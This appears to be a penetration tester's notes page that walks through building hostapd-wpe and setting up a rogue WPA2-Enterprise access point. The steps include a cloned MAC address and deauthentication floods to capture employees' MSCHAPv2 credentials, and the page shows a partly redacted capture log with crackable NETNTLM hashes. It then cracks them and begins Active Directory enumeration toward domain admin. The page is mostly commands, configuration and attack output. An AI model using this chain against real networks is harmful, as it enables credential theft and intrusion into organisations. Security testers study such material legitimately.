# HOSTAPD-WPE

[**hostapd-wpe**](https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe)

```
apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends
```

Download the files:

```
wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
```

```
make
make install
make wpe
```

**Creating certs**

```
cd /etc/hostapd-wpe/certs
./bootstrap
make install
```

vim wpeattackap.conf

```
└─$ cat wpe_custom.conf 
# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan0mon
ssid=XX-AP  #name of the app (even it is hidden)
channel=4
hw_mode=g

# --------------------
# WPA configuration
# --------------------
wpa=2                                       # use WPA2 version
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# --------------------------
# EAP server configuration
# --------------------------
ieee8021x=1                                 # requires 802.1x authentication server
eapol_key_index_workaround=0                # EAPOL key index fix for WinXP supplicant (disabled here)
eap_server=1                                # enable integrated EAP server instead of RADIUS
#eap_user_file=fakenet.eap_user              # filename containing information of users

# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
#ca_cert=/root/certs/ca.pem
#server_cert=/root/certs/server.pem 
#private_key=/root/certs/server.key          # private key for the server certificate
#private_key_passwd=                         # password used to encrypt the private key (empty here)
#dh_file=/root/certs/dhparam.pem             # file path to DH/DSA parameters file (in PEM format)

eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh


# -----------------------------
# mana specific configuration
# -----------------------------
#mana_wpe=1                                  # enable WPE mode to intercept various EAP credentials
#mana_eapsuccess=1                           # return EAP success to the clients, and have them connect

```

Use the same MAC of target APP

```
macchanger --mac xx:Xx:xx:xx interface
```

```
sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf
```

<pre><code><strong>sudo airodump-ng --channel 4 wlp0s20f3 -w temp --essid-regex XX-AP
</strong></code></pre>

Deauth (with MAC clone, deauth is not necessary if signal is strong \m/)

```
sudo aireplay-ng --deauth 50 -a 6c:8d:77:27:a1:25  --ignore-negative-one wlp0s20f3
```

**GOTCHA!**

```
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.1X: Identity received from STA: 'XXXX\xxx.xxx'


mschapv2: Fri Mar 15 03:36:34 2024
         username:      xxx\xxx.xx
         challenge:     57:f6xx:c6:33:4b
         response:      9e:2a:87xxxxx:ef:b2:58:4a:3f:b3:fd:1d:03:08
         jtr NETNTLM:           xx\xx.leao:$NETNTLM$57f6xc6334b$9exxxxxxx84a3fb3fd1d0308
         hashcat NETNTLM:       xx\xx.leao::::9e2a8702xxf6bbxxxx3fb3fd1d0308:57f6xxxc6334b
wlan0mon: STA 5c:fb:3a:2f:00:2f IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: associated (aid 3)
```

Cracking it!

```
john-the-ripper hash 
```

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FacI5VGxIbCVkaCRQEwcd%2Fimage.png?alt=media&#x26;token=1221077b-0676-4c1d-975a-880bb67be1ae" alt=""><figcaption></figcaption></figure>

## Getting Domain Admin From WiFI Scratch Approach \o/

As the SSID is hidden, the "hidden" network can be created.

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FQ1Tc957NNhH2hxvesc9a%2Fimage.png?alt=media&#x26;token=c328619c-dad5-4f22-9bbf-2da3285eb838" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2F8cjqswPfd3MdHB0euvUA%2Fimage.png?alt=media&#x26;token=d4e73c37-c9b4-4fde-8356-09d5e89a4444" alt=""><figcaption></figcaption></figure>

```
cat /etc/resolv.conf
nameserver 127.0.0.53
options edns0 trust-ad
search xxx.local

ptavares@kali:~$ host xxxx.local
xxx.local has address 10.1.11.36
xxxx.local has address 10.0.4.1
xxxx.local has address 10.1.0.1

```

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FqopKqOvsF8fKvUuMa3AU%2Fimage.png?alt=media&#x26;token=6ab31291-8a77-4bbd-8c93-9b37916d1149" alt=""><figcaption></figcaption></figure>

```
Bloodhound, or other tools can be executed now \,)
crackmapexec smb DC01 -u -p --users
```

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FnUIL7dvDeTXKpXACLAiN%2Fimage.png?alt=media&#x26;token=e5dfc569-9729-43b7-8d76-5bde47d88dbb" alt=""><figcaption></figcaption></figure>

## Reference

{% embed url="<https://www.netprojnetworks.com/wireless-pentest-lab-part-3/>" %}